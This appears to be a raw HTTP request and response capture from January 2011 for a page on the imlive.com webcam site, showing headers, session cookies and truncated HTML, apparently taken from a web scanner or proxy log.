Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:00 GMT
Connection: close
Content-Length: 33732
Vary: Accept-Encoding
<html> <head> <meta name="keywords" content="live Video Chat, Video Chat live, Video Chat live, live Video Chat, webcam chat, live web cam, webcam live, live webcam, web cam live, web cam communti ...[SNIP]...
GET /videosfr.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:11:20 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:21 GMT
Connection: close
Content-Length: 15706
Vary: Accept-Encoding
<html> <head> <title>Video Chat Recorded on Webcam at ImLive</title> <meta name="description" content="Come in and discover what our hosts have recorded in Friends & Romance live webcam vide ...[SNIP]...